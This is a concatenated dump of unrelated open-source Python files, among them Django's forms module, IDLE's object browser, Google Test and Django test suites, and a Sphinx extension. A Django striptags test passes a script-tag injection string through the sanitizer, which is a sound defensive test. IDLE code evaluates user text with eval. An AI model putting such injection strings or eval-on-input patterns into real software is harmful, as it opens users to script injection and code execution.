file.write(argupdate + "did it work???")
file.write("stagin in 2 " + argupdate + '\n')
job.addInputFileUrl(argupdate)
else:
print "Stagin in: " + arg
file.write("stagin in 3" + arg + '\n')
file.write("arg update " + argupdate + '\n')
file.write("os path join" + os.path.join(folder.split('.')[0], fil))
job.addInputFileUrl(arg)
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
# Strip down to its basename any path that exists or will exist
if(os.path.exists(arg)) or (os.path.exists('/'.join(arg.split('/')[:len(arg.split('/'))-1]))):
new_commandline += (os.path.basename(arg) + " ")
else:
new_commandline += (arg + " ")
print job_header % (new_commandline)
job.setCommandline("bash "+ job_script.split('/')[-1])
try:
jscript = open(job_script, 'w')
script = job_header % (new_commandline)
jscript.write(script)
jscript.close()
except:
print "Cannot write job script"
sys.exit(-5)
try:
job.addInputFileUrl(job_script)
except:
print "Cannot stage nesi job script"
sys.exit(-5)
#open job file
#stage in the job file
for inputs in input_files:
try:
job.addInputFileUrl(inputs)
print "input: " + inputs
except Exception, e:
print "Cannot stage in: " + arg
print e
job.kill(True)
sys.exit(-3)
job.createJob(group)
print "Submitting job..."
try:
job.submitJob()
except Exception, e:
# Just catch all exceptions for time being. TODO
print "Cannot submit job currently."
print e
job.kill(True)
sys.exit(1)
# That's all folks!
sys.exit(0)
|
zsiciarz/django | refs/heads/master | django/forms/forms.py | 9 |
"""
Form classes
"""
import copy
from collections import OrderedDict
from django.core.exceptions import NON_FIELD_ERRORS, ValidationError
# BoundField is imported for backwards compatibility in Django 1.9
from django.forms.boundfield import BoundField # NOQA
from django.forms.fields import Field, FileField
# pretty_name is imported for backwards compatibility in Django 1.9
from django.forms.utils import ErrorDict, ErrorList, pretty_name # NOQA
from django.forms.widgets import Media, MediaDefiningClass
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.utils.html import conditional_escape, html_safe
from django.utils.safestring import mark_safe
from django.utils.translation import gettext as _
from .renderers import get_default_renderer
__all__ = ('BaseForm', 'Form')
class DeclarativeFieldsMetaclass(MediaDefiningClass):
"""Collect Fields declared on the base classes."""
def __new__(mcs, name, bases, attrs):
# Collect fields from current class.
current_fields = []
for key, value in list(attrs.items()):
if isinstance(value, Field):
current_fields.append((key, value))
attrs.pop(key)
attrs['declared_fields'] = OrderedDict(current_fields)
new_class = super(DeclarativeFieldsMetaclass, mcs).__new__(mcs, name, bases, attrs)
# Walk through the MRO.
declared_fields = OrderedDict()
for base in reversed(new_class.__mro__):
# Collect fields from base class.
if hasattr(base, 'declared_fields'):
declared_fields.update(base.declared_fields)
# Field shadowing.
for attr, value in base.__dict__.items():
if value is None and attr in declared_fields:
declared_fields.pop(attr)
new_class.base_fields = declared_fields
new_class.declared_fields = declared_fields
return new_class
@classmethod
def __prepare__(metacls, name, bases, **kwds):
# Remember the order in which form fields are defined.
return OrderedDict()
@html_safe
class BaseForm:
"""
The main implementation of all the Form logic. Note that this class is
different from Form. See the comments by the Form class for more info. Any
improvements to the form API should be made to this class, not to the Form
class.
"""
default_renderer = None
field_order = None
prefix = None
use_required_attribute = True
def __init__(self, data=None, files=None, auto_id='id_%s', prefix=None,
initial=None, error_class=ErrorList, label_suffix=None,
empty_permitted=False, field_order=None, use_required_attribute=None, renderer=None):
self.is_bound = data is not None or files is not None
self.data = {} if data is None else data
self.files = {} if files is None else files
self.auto_id = auto_id
if prefix is not None:
self.prefix = prefix
self.initial = initial or {}
self.error_class = error_class
# Translators: This is the default suffix added to form field labels
self.label_suffix = label_suffix if label_suffix is not None else _(':')
self.empty_permitted = empty_permitted
self._errors = None # Stores the errors after clean() has been called.
# The base_fields class attribute is the *class-wide* definition of
# fields. Because a particular *instance* of the class might want to
# alter self.fields, we create self.fields here by copying base_fields.
# Instances should always modify self.fields; they should not modify
# self.base_fields.
self.fields = copy.deepcopy(self.base_fields)
self._bound_fields_cache = {}
self.order_fields(self.field_order if field_order is None else field_order)
if use_required_attribute is not None:
self.use_required_attribute = use_required_attribute
# Initialize form renderer. Use a global default if not specified
# either as an argument or as self.default_renderer.
if renderer is None:
if self.default_renderer is None:
renderer = get_default_renderer()
else:
renderer = self.default_renderer
if isinstance(self.default_renderer, type):
renderer = renderer()
self.renderer = renderer
def order_fields(self, field_order):
"""
Rearrange the fields according to field_order.
field_order is a list of field names specifying the order. Append fields
not included in the list in the default order for backward compatibility
with subclasses not overriding field_order. If field_order is None,
keep all fields in the order defined in the class. Ignore unknown
fields in field_order to allow disabling fields in form subclasses
without redefining ordering.
"""
if field_order is None:
return
fields = OrderedDict()
for key in field_order:
try:
fields[key] = self.fields.pop(key)
except KeyError: # ignore unknown fields
pass
fields.update(self.fields) # add remaining fields in original order
self.fields = fields
def __str__(self):
return self.as_table()
def __repr__(self):
if self._errors is None:
is_valid = "Unknown"
else:
is_valid = self.is_bound and not bool(self._errors)
return '<%(cls)s bound=%(bound)s, valid=%(valid)s, fields=(%(fields)s)>' % {
'cls': self.__class__.__name__,
'bound': self.is_bound,
'valid': is_valid,
'fields': ';'.join(self.fields),
}
def __iter__(self):
for name in self.fields:
yield self[name]
def __getitem__(self, name):
"""Return a BoundField with the given name."""
try:
field = self.fields[name]
except KeyError:
raise KeyError(
"Key '%s' not found in '%s'. Choices are: %s." % (
name,
self.__class__.__name__,
', '.join(sorted(f for f in self.fields)),
)
)
if name not in self._bound_fields_cache:
self._bound_fields_cache[name] = field.get_bound_field(self, name)
return self._bound_fields_cache[name]
@property
def errors(self):
"""Return an ErrorDict for the data provided for the form."""
if self._errors is None:
self.full_clean()
return self._errors
def is_valid(self):
"""Return True if the form has no errors, or False otherwise."""
return self.is_bound and not self.errors
def add_prefix(self, field_name):
"""
Return the field name with a prefix appended, if this Form has a
prefix set.
Subclasses may wish to override.
"""
return '%s-%s' % (self.prefix, field_name) if self.prefix else field_name
def add_initial_prefix(self, field_name):
"""Add a 'initial' prefix for checking dynamic initial values."""
return 'initial-%s' % self.add_prefix(field_name)
def _html_output(self, normal_row, error_row, row_ender, help_text_html, errors_on_separate_row):
"Output HTML. Used by as_table(), as_ul(), as_p()."
top_errors = self.non_field_errors() # Errors that should be displayed above all fields.
output, hidden_fields = [], []
for name, field in self.fields.items():
html_class_attr = ''
bf = self[name]
# Escape and cache in local variable.
bf_errors = self.error_class([conditional_escape(error) for error in bf.errors])
if bf.is_hidden:
if bf_errors:
top_errors.extend(
[_('(Hidden field %(name)s) %(error)s') % {'name': name, 'error': force_text(e)}
for e in bf_errors])
hidden_fields.append(str(bf))
else:
# Create a 'class="..."' attribute if the row should have any
# CSS classes applied.
css_classes = bf.css_classes()
if css_classes:
html_class_attr = ' class="%s"' % css_classes
if errors_on_separate_row and bf_errors:
output.append(error_row % force_text(bf_errors))
if bf.label:
label = conditional_escape(force_text(bf.label))
label = bf.label_tag(label) or ''
else:
label = ''
if field.help_text:
help_text = help_text_html % field.help_text
else:
help_text = ''
output.append(normal_row % {
'errors': bf_errors,
'label': label,
'field': bf,
'help_text': help_text,
'html_class_attr': html_class_attr,
'css_classes': css_classes,
'field_name': bf.html_name,
})
if top_errors:
output.insert(0, error_row % top_errors)
if hidden_fields: # Insert any hidden fields in the last row.
str_hidden = ''.join(hidden_fields)
if output:
last_row = output[-1]
# Chop off the trailing row_ender (e.g. '</td></tr>') and
# insert the hidden fields.
if not last_row.endswith(row_ender):
# This can happen in the as_p() case (and possibly others
# that users write): if there are only top errors, we may
# not be able to conscript the last row for our purposes,
# so insert a new, empty row.
last_row = (normal_row % {
'errors': '',
'label': '',
'field': '',
'help_text': '',
'html_class_attr': html_class_attr,
'css_classes': '',
'field_name': '',
})
output.append(last_row)
output[-1] = last_row[:-len(row_ender)] + str_hidden + row_ender
else:
# If there aren't any rows in the output, just append the
# hidden fields.
output.append(str_hidden)
return mark_safe('\n'.join(output))
def as_table(self):
"Return this form rendered as HTML <tr>s -- excluding the <table></table>."
return self._html_output(
normal_row='<tr%(html_class_attr)s><th>%(label)s</th><td>%(errors)s%(field)s%(help_text)s</td></tr>',
error_row='<tr><td colspan="2">%s</td></tr>',
row_ender='</td></tr>',
help_text_html='<br /><span class="helptext">%s</span>',
errors_on_separate_row=False)
def as_ul(self):
"Return this form rendered as HTML <li>s -- excluding the <ul></ul>."
return self._html_output(
normal_row='<li%(html_class_attr)s>%(errors)s%(label)s %(field)s%(help_text)s</li>',
error_row='<li>%s</li>',
row_ender='</li>',
help_text_html=' <span class="helptext">%s</span>',
errors_on_separate_row=False)
def as_p(self):
"Return this form rendered as HTML <p>s."
return self._html_output(
normal_row='<p%(html_class_attr)s>%(label)s %(field)s%(help_text)s</p>',
error_row='%s',
row_ender='</p>',
help_text_html=' <span class="helptext">%s</span>',
errors_on_separate_row=True)
def non_field_errors(self):
"""
Return an ErrorList of errors that aren't associated with a particular
field -- i.e., from Form.clean(). Return an empty ErrorList if there
are none.
"""
return self.errors.get(NON_FIELD_ERRORS, self.error_class(error_class='nonfield'))
def add_error(self, field, error):
"""
Update the content of `self._errors`.
The `field` argument is the name of the field to which the errors
should be added. If it's None, treat the errors as NON_FIELD_ERRORS.
The `error` argument can be a single error, a list of errors, or a
dictionary that maps field names to lists of errors. An "error" can be
either a simple string or an instance of ValidationError with its
message attribute set and a "list or dictionary" can be an actual
`list` or `dict` or an instance of ValidationError with its
`error_list` or `error_dict` attribute set.
If `error` is a dictionary, the `field` argument *must* be None and
errors will be added to the fields that correspond to the keys of the
dictionary.
"""
if not isinstance(error, ValidationError):
# Normalize to ValidationError and let its constructor
# do the hard work of making sense of the input.
error = ValidationError(error)
if hasattr(error, 'error_dict'):
if field is not None:
raise TypeError(
"The argument `field` must be `None` when the `error` "
"argument contains errors for multiple fields."
)
else:
error = error.error_dict
else:
error = {field or NON_FIELD_ERRORS: error.error_list}
for field, error_list in error.items():
if field not in self.errors:
if field != NON_FIELD_ERRORS and field not in self.fields:
raise ValueError(
"'%s' has no field named '%s'." % (self.__class__.__name__, field))
if field == NON_FIELD_ERRORS:
self._errors[field] = self.error_class(error_class='nonfield')
else:
self._errors[field] = self.error_class()
self._errors[field].extend(error_list)
if field in self.cleaned_data:
del self.cleaned_data[field]
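# A short usage sketch (hypothetical form and field names) covering the
# three accepted shapes of `error` described in the docstring above:
#
#     form.add_error('name', 'This name is taken.')      # single field
#     form.add_error(None, 'Form-wide problem.')         # NON_FIELD_ERRORS
#     form.add_error(None, {'name': ['Bad.'],            # dict form:
#                           'age': ['Too low.']})        # field must be None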
def has_error(self, field, code=None):
if code is None:
return field in self.errors
if field in self.errors:
for error in self.errors.as_data()[field]:
if error.code == code:
return True
return False
def full_clean(self):
"""
Clean all of self.data and populate self._errors and self.cleaned_data.
"""
self._errors = ErrorDict()
if not self.is_bound: # Stop further processing.
return
self.cleaned_data = {}
# If the form is permitted to be empty, and none of the form data has
# changed from the initial data, short circuit any validation.
if self.empty_permitted and not self.has_changed():
return
self._clean_fields()
self._clean_form()
self._post_clean()
def _clean_fields(self):
for name, field in self.fields.items():
# value_from_datadict() gets the data from the data dictionaries.
# Each widget type knows how to retrieve its own data, because some
# widgets split data over several HTML fields.
if field.disabled:
value = self.get_initial_for_field(field, name)
else:
value = field.widget.value_from_datadict(self.data, self.files, self.add_prefix(name))
try:
if isinstance(field, FileField):
initial = self.get_initial_for_field(field, name)
value = field.clean(value, initial)
else:
value = field.clean(value)
self.cleaned_data[name] = value
if hasattr(self, 'clean_%s' % name):
value = getattr(self, 'clean_%s' % name)()
self.cleaned_data[name] = value
except ValidationError as e:
self.add_error(name, e)
def _clean_form(self):
try:
cleaned_data = self.clean()
except ValidationError as e:
self.add_error(None, e)
else:
if cleaned_data is not None:
self.cleaned_data = cleaned_data
def _post_clean(self):
"""
An internal hook for performing additional cleaning after form cleaning
is complete. Used for model validation in model forms.
"""
pass
def clean(self):
"""
Hook for doing any extra form-wide cleaning after Field.clean() has been
called on every field. Any ValidationError raised by this method will
not be associated with a particular field; it will have a special-case
association with the field named '__all__'.
"""
return self.cleaned_data
def has_changed(self):
"""Return True if data differs from initial."""
return bool(self.changed_data)
@cached_property
def changed_data(self):
data = []
for name, field in self.fields.items():
prefixed_name = self.add_prefix(name)
data_value = field.widget.value_from_datadict(self.data, self.files, prefixed_name)
if not field.show_hidden_initial:
# Use the BoundField's initial as this is the value passed to
# the widget.
initial_value = self[name].initial
else:
initial_prefixed_name = self.add_initial_prefix(name)
hidden_widget = field.hidden_widget()
try:
initial_value = field.to_python(hidden_widget.value_from_datadict(
self.data, self.files, initial_prefixed_name))
except ValidationError:
# Always assume data has changed if validation fails.
data.append(name)
continue
if field.has_changed(initial_value, data_value):
data.append(name)
return data
@property
def media(self):
"""Return all media required to render the widgets on this form."""
media = Media()
for field in self.fields.values():
media = media + field.widget.media
return media
def is_multipart(self):
"""
Return True if the form needs to be multipart-encoded, i.e. it has
FileInput, or False otherwise.
"""
for field in self.fields.values():
if field.widget.needs_multipart_form:
return True
return False
def hidden_fields(self):
"""
Return a list of all the BoundField objects that are hidden fields.
Useful for manual form layout in templates.
"""
return [field for field in self if field.is_hidden]
def visible_fields(self):
"""
Return a list of BoundField objects that aren't hidden fields.
The opposite of the hidden_fields() method.
"""
return [field for field in self if not field.is_hidden]
def get_initial_for_field(self, field, field_name):
"""
Return initial data for field on form. Use initial data from the form
or the field, in that order. Evaluate callable values.
"""
value = self.initial.get(field_name, field.initial)
if callable(value):
value = value()
return value
class Form(BaseForm, metaclass=DeclarativeFieldsMetaclass):
"A collection of Fields, plus their associated data."
# This is a separate class from BaseForm in order to abstract the way
# self.fields is specified. This class (Form) is the one that does the
# fancy metaclass stuff purely for the semantic sugar -- it allows one
# to define a form using declarative syntax.
# BaseForm itself has no way of designating self.fields.
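# A hedged illustration (not part of Django) of the declarative machinery:
# fields declared on the class are collected into base_fields by
# DeclarativeFieldsMetaclass, and setting an inherited field to None in a
# subclass removes it ("field shadowing", handled in __new__ above):
#
#     from django import forms
#
#     class ContactForm(forms.Form):
#         name = forms.CharField()
#         email = forms.EmailField()
#
#     class AnonymousContactForm(ContactForm):
#         email = None  # shadowed: removed from base_fields
#
#     list(AnonymousContactForm.base_fields)  # -> ['name']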
|
kerr-huang/SL4A | refs/heads/master | python/src/Lib/idlelib/ObjectBrowser.py | 67 |
# XXX TO DO:
# - popup menu
# - support partial or total redisplay
# - more doc strings
# - tooltips
# object browser
# XXX TO DO:
# - for classes/modules, add "open source" to object browser
from TreeWidget import TreeItem, TreeNode, ScrolledCanvas
from repr import Repr
myrepr = Repr()
myrepr.maxstring = 100
myrepr.maxother = 100
class ObjectTreeItem(TreeItem):
def __init__(self, labeltext, object, setfunction=None):
self.labeltext = labeltext
self.object = object
self.setfunction = setfunction
def GetLabelText(self):
return self.labeltext
def GetText(self):
return myrepr.repr(self.object)
def GetIconName(self):
if not self.IsExpandable():
return "python"
def IsEditable(self):
return self.setfunction is not None
def SetText(self, text):
try:
value = eval(text)
self.setfunction(value)
except:
pass
else:
self.object = value
def IsExpandable(self):
return bool(dir(self.object))
def GetSubList(self):
keys = dir(self.object)
sublist = []
for key in keys:
try:
value = getattr(self.object, key)
except AttributeError:
continue
item = make_objecttreeitem(
str(key) + " =",
value,
lambda value, key=key, object=self.object:
setattr(object, key, value))
sublist.append(item)
return sublist
class InstanceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
sublist.insert(0,
make_objecttreeitem("__class__ =", self.object.__class__))
return sublist
class ClassTreeItem(ObjectTreeItem):
def IsExpandable(self):
return True
def GetSubList(self):
sublist = ObjectTreeItem.GetSubList(self)
if len(self.object.__bases__) == 1:
item = make_objecttreeitem("__bases__[0] =",
self.object.__bases__[0])
else:
item = make_objecttreeitem("__bases__ =", self.object.__bases__)
sublist.insert(0, item)
return sublist
class AtomicObjectTreeItem(ObjectTreeItem):
def IsExpandable(self):
return 0
class SequenceTreeItem(ObjectTreeItem):
def IsExpandable(self):
return len(self.object) > 0
def keys(self):
return range(len(self.object))
def GetSubList(self):
sublist = []
for key in self.keys():
try:
value = self.object[key]
except KeyError:
continue
def setfunction(value, key=key, object=self.object):
object[key] = value
item = make_objecttreeitem("%r:" % (key,), value, setfunction)
sublist.append(item)
return sublist
class DictTreeItem(SequenceTreeItem):
def keys(self):
keys = self.object.keys()
try:
keys.sort()
except:
pass
return keys
from types import *
dispatch = {
IntType: AtomicObjectTreeItem,
LongType: AtomicObjectTreeItem,
FloatType: AtomicObjectTreeItem,
StringType: AtomicObjectTreeItem,
TupleType: SequenceTreeItem,
ListType: SequenceTreeItem,
DictType: DictTreeItem,
InstanceType: InstanceTreeItem,
ClassType: ClassTreeItem,
}
def make_objecttreeitem(labeltext, object, setfunction=None):
t = type(object)
if dispatch.has_key(t):
c = dispatch[t]
else:
c = ObjectTreeItem
return c(labeltext, object, setfunction)
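# A hedged sketch of extending the dispatch table for a custom type
# (hypothetical class; mirrors how the built-in entries above are used):
#
#     class FrozensetTreeItem(AtomicObjectTreeItem):
#         pass
#
#     dispatch[frozenset] = FrozensetTreeItem
#     item = make_objecttreeitem("fs =", frozenset([1, 2]))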
# Test script
def _test():
import sys
from Tkinter import Tk
root = Tk()
root.configure(bd=0, bg="yellow")
root.focus_set()
sc = ScrolledCanvas(root, bg="white", highlightthickness=0, takefocus=1)
sc.frame.pack(expand=1, fill="both")
item = make_objecttreeitem("sys", sys)
node = TreeNode(sc.canvas, None, item)
node.update()
root.mainloop()
if __name__ == '__main__':
_test()
|
lukaspj/Torque6 | refs/heads/master | src/testing/googleTest/test/gtest_env_var_test.py | 2408 |
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Verifies that Google Test correctly parses environment variables."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import gtest_test_utils
IS_WINDOWS = os.name == 'nt'
IS_LINUX = os.name == 'posix' and os.uname()[0] == 'Linux'
COMMAND = gtest_test_utils.GetTestExecutablePath('gtest_env_var_test_')
environ = os.environ.copy()
def AssertEq(expected, actual):
if expected != actual:
print 'Expected: %s' % (expected,)
print ' Actual: %s' % (actual,)
raise AssertionError
def SetEnvVar(env_var, value):
"""Sets the env variable to 'value'; unsets it when 'value' is None."""
if value is not None:
environ[env_var] = value
elif env_var in environ:
del environ[env_var]
def GetFlag(flag):
"""Runs gtest_env_var_test_ and returns its output."""
args = [COMMAND]
if flag is not None:
args += [flag]
return gtest_test_utils.Subprocess(args, env=environ).output
def TestFlag(flag, test_val, default_val):
"""Verifies that the given flag is affected by the corresponding env var."""
env_var = 'GTEST_' + flag.upper()
SetEnvVar(env_var, test_val)
AssertEq(test_val, GetFlag(flag))
SetEnvVar(env_var, None)
AssertEq(default_val, GetFlag(flag))
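# For example, TestFlag('color', 'yes', 'auto') exports GTEST_COLOR=yes into the
# child environment, runs gtest_env_var_test_ with 'color' as its argument, and
# expects the binary to print back 'yes'; once the variable is unset, the binary
# should print the built-in default 'auto'.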
class GTestEnvVarTest(gtest_test_utils.TestCase):
def testEnvVarAffectsFlag(self):
"""Tests that environment variable should affect the corresponding flag."""
TestFlag('break_on_failure', '1', '0')
TestFlag('color', 'yes', 'auto')
TestFlag('filter', 'FooTest.Bar', '*')
TestFlag('output', 'xml:tmp/foo.xml', '')
TestFlag('print_time', '0', '1')
TestFlag('repeat', '999', '1')
TestFlag('throw_on_failure', '1', '0')
TestFlag('death_test_style', 'threadsafe', 'fast')
TestFlag('catch_exceptions', '0', '1')
if IS_LINUX:
TestFlag('death_test_use_fork', '1', '0')
TestFlag('stack_trace_depth', '0', '100')
if __name__ == '__main__':
gtest_test_utils.Main()
|
hybrideagle/django
|
refs/heads/master
|
tests/template_tests/filter_tests/test_striptags.py
|
324
|
from django.template.defaultfilters import striptags
from django.test import SimpleTestCase
from django.utils.safestring import mark_safe
from ..utils import setup
class StriptagsTests(SimpleTestCase):
@setup({'striptags01': '{{ a|striptags }} {{ b|striptags }}'})
def test_striptags01(self):
output = self.engine.render_to_string(
'striptags01',
{
'a': '<a>x</a> <p><b>y</b></p>',
'b': mark_safe('<a>x</a> <p><b>y</b></p>'),
},
)
self.assertEqual(output, 'x y x y')
@setup({'striptags02': '{% autoescape off %}{{ a|striptags }} {{ b|striptags }}{% endautoescape %}'})
def test_striptags02(self):
output = self.engine.render_to_string(
'striptags02',
{
'a': '<a>x</a> <p><b>y</b></p>',
'b': mark_safe('<a>x</a> <p><b>y</b></p>'),
},
)
self.assertEqual(output, 'x y x y')
class FunctionTests(SimpleTestCase):
def test_strip(self):
self.assertEqual(
striptags('some <b>html</b> with <script>alert("You smell")</script> disallowed <img /> tags'),
'some html with alert("You smell") disallowed tags',
)
def test_non_string_input(self):
self.assertEqual(striptags(123), '123')
|
GinnyN/Team-Fortress-RPG-Generators
|
refs/heads/master
|
build/lib/django/contrib/flatpages/tests/views.py
|
77
|
import os
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.flatpages.models import FlatPage
from django.test import TestCase
class FlatpageViewTests(TestCase):
fixtures = ['sample_flatpages']
urls = 'django.contrib.flatpages.tests.urls'
def setUp(self):
self.old_MIDDLEWARE_CLASSES = settings.MIDDLEWARE_CLASSES
flatpage_middleware_class = 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
if flatpage_middleware_class in settings.MIDDLEWARE_CLASSES:
settings.MIDDLEWARE_CLASSES = tuple(m for m in settings.MIDDLEWARE_CLASSES if m != flatpage_middleware_class)
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(
os.path.dirname(__file__),
'templates'
),
)
self.old_LOGIN_URL = settings.LOGIN_URL
settings.LOGIN_URL = '/accounts/login/'
def tearDown(self):
settings.MIDDLEWARE_CLASSES = self.old_MIDDLEWARE_CLASSES
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
settings.LOGIN_URL = self.old_LOGIN_URL
def test_view_flatpage(self):
"A flatpage can be served through a view"
response = self.client.get('/flatpage_root/flatpage/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it flat!</p>")
def test_view_non_existent_flatpage(self):
"A non-existent flatpage raises 404 when served through a view"
response = self.client.get('/flatpage_root/no_such_flatpage/')
self.assertEqual(response.status_code, 404)
def test_view_authenticated_flatpage(self):
"A flatpage served through a view can require authentication"
response = self.client.get('/flatpage_root/sekrit/')
self.assertRedirects(response, '/accounts/login/?next=/flatpage_root/sekrit/')
User.objects.create_user('testuser', 'test@example.com', 's3krit')
self.client.login(username='testuser',password='s3krit')
response = self.client.get('/flatpage_root/sekrit/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it sekrit!</p>")
def test_fallback_flatpage(self):
"A fallback flatpage won't be served if the middleware is disabled"
response = self.client.get('/flatpage/')
self.assertEqual(response.status_code, 404)
def test_fallback_non_existent_flatpage(self):
"A non-existent flatpage won't be served if the fallback middlware is disabled"
response = self.client.get('/no_such_flatpage/')
self.assertEqual(response.status_code, 404)
def test_view_flatpage_special_chars(self):
"A flatpage with special chars in the URL can be served through a view"
fp = FlatPage.objects.create(
url="/some.very_special~chars-here/",
title="A very special page",
content="Isn't it special!",
enable_comments=False,
registration_required=False,
)
fp.sites.add(settings.SITE_ID)
response = self.client.get('/flatpage_root/some.very_special~chars-here/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, "<p>Isn't it special!</p>")
class FlatpageViewAppendSlashTests(TestCase):
fixtures = ['sample_flatpages']
urls = 'django.contrib.flatpages.tests.urls'
def setUp(self):
self.old_MIDDLEWARE_CLASSES = settings.MIDDLEWARE_CLASSES
flatpage_middleware_class = 'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware'
if flatpage_middleware_class in settings.MIDDLEWARE_CLASSES:
settings.MIDDLEWARE_CLASSES = tuple(m for m in settings.MIDDLEWARE_CLASSES if m != flatpage_middleware_class)
self.old_TEMPLATE_DIRS = settings.TEMPLATE_DIRS
settings.TEMPLATE_DIRS = (
os.path.join(
os.path.dirname(__file__),
'templates'
),
)
self.old_LOGIN_URL = settings.LOGIN_URL
settings.LOGIN_URL = '/accounts/login/'
self.old_APPEND_SLASH = settings.APPEND_SLASH
settings.APPEND_SLASH = True
def tearDown(self):
settings.MIDDLEWARE_CLASSES = self.old_MIDDLEWARE_CLASSES
settings.TEMPLATE_DIRS = self.old_TEMPLATE_DIRS
settings.LOGIN_URL = self.old_LOGIN_URL
settings.APPEND_SLASH = self.old_APPEND_SLASH
def test_redirect_view_flatpage(self):
"A flatpage can be served through a view and should add a slash"
response = self.client.get('/flatpage_root/flatpage')
self.assertRedirects(response, '/flatpage_root/flatpage/', status_code=301)
def test_redirect_view_non_existent_flatpage(self):
"A non-existent flatpage raises 404 when served through a view and should not add a slash"
response = self.client.get('/flatpage_root/no_such_flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_fallback_flatpage(self):
"A fallback flatpage won't be served if the middleware is disabled and should not add a slash"
response = self.client.get('/flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_fallback_non_existent_flatpage(self):
"A non-existent flatpage won't be served if the fallback middlware is disabled and should not add a slash"
response = self.client.get('/no_such_flatpage')
self.assertEqual(response.status_code, 404)
def test_redirect_view_flatpage_special_chars(self):
"A flatpage with special chars in the URL can be served through a view and should add a slash"
fp = FlatPage.objects.create(
url="/some.very_special~chars-here/",
title="A very special page",
content="Isn't it special!",
enable_comments=False,
registration_required=False,
)
fp.sites.add(1)
response = self.client.get('/flatpage_root/some.very_special~chars-here')
self.assertRedirects(response, '/flatpage_root/some.very_special~chars-here/', status_code=301)
|
dan1/horizon-x509
|
refs/heads/master
|
openstack_dashboard/dashboards/admin/overview/urls.py
|
66
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.conf.urls import patterns
from django.conf.urls import url
from openstack_dashboard.dashboards.admin.overview import views
urlpatterns = patterns(
'',
url(r'^$', views.GlobalOverview.as_view(), name='index'),
)
|
codio-packs/symfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/_exts/configurationblock.py
|
2577
|
#Copyright (c) 2010 Fabien Potencier
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from docutils.parsers.rst import Directive, directives
from docutils import nodes
from string import upper
class configurationblock(nodes.General, nodes.Element):
pass
class ConfigurationBlock(Directive):
has_content = True
required_arguments = 0
optional_arguments = 0
final_argument_whitespace = True
option_spec = {}
formats = {
'html': 'HTML',
'xml': 'XML',
'php': 'PHP',
'yaml': 'YAML',
'jinja': 'Twig',
'html+jinja': 'Twig',
'jinja+html': 'Twig',
'php+html': 'PHP',
'html+php': 'PHP',
'ini': 'INI',
'php-annotations': 'Annotations',
}
def run(self):
env = self.state.document.settings.env
node = nodes.Element()
node.document = self.state.document
self.state.nested_parse(self.content, self.content_offset, node)
entries = []
for i, child in enumerate(node):
if isinstance(child, nodes.literal_block):
